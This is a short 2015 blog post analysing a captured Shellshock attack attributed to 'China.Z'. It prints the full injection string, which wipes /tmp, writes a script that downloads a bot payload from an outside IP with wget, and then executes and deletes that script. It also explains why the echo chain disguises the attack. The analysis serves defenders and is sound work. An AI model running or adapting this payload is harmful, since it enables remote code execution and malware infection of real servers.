Tuesday, March 17, 2015

Shellshock Deception with echo

I thought this Shellshock attempt by China.Z was a bit different than what I'd seen before and worth discussing quickly.

() { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://222.186.34.11:21999/360 -O /tmp/Kinas.X-brxl. >> /tmp/key.sh;echo echo By China.Z >> /tmp/key.sh;echo chmod 755 /tmp/Kinas.X-brxl. >> /tmp/key.sh;echo /tmp/Kinas.X-brxl. >> /tmp/key.sh;echo rm -rf /tmp/key.sh >> /tmp/key.sh;chmod 755 /tmp/key.sh;/tmp/key.sh"

Below I've provided some analysis of what is occurring on each line.
  • /bin/bash -c "rm -rf /tmp/*;

    Delete all content from the temp folder.
  • echo wget http://222.186.34.11:21999/360 -O /tmp/Kinas.X-brxl. >> /tmp/key.sh;

    Build a Key.sh file that will run the malicious code. In it put as the 1st line the wget download of my evil payload (Perlbot) into a Kinas file.
  • echo echo By China.Z >> /tmp/key.sh;

    Next append to the Key file a command that simply prints my evil handle name.
  • echo chmod 755 /tmp/Kinas.X-brxl. >> /tmp/key.sh;

    Then append to the Key file a command that changes the permissions of my payload Kinas file to executable.
  • echo /tmp/Kinas.X-brxl. >> /tmp/key.sh;

    Then append to the Key file a command that runs the evil Kinas payload file.
  • echo rm -rf /tmp/key.sh >> /tmp/key.sh;

    Then append to the key file a command that deletes all content from the temp folder to cleanup after themself.
  • chmod 755 /tmp/key.sh;

    Then change the permissions on the key file to executable.
  • /tmp/key.sh;

    Then run my malicious Key file.


The final results if a file /tmp/key.sh that contains the code, which is then executed

wget http://222.186.34.11:21999/360 -O /tmp/Kinas.X-brxl.
echo By China.Z
echo chmod 755 /tmp/Kinas.X-brxl.
/tmp/Kinas.X-brxl.
rm -rf /tmp/key.sh

WHY GO THRU ALL THIS EFFORT? Why did China.Z choose to spit everything to a "Key" file before finally running the key file? My best guess is deception. A non linux savvy IT staff at first glance may look at the code above and assume that this is a bunch of harmless echo's ... basically a proof-of-concept attempt saying that 'if I was evil, I'd be able to own you ... but I just did some echo's so I'm a friendly'. But if you look closer per my analysis you'll see that the echo's are actually used to deliver the payload and infect the machine.

Keep on monitoring!

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Posted by at
Labels: ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)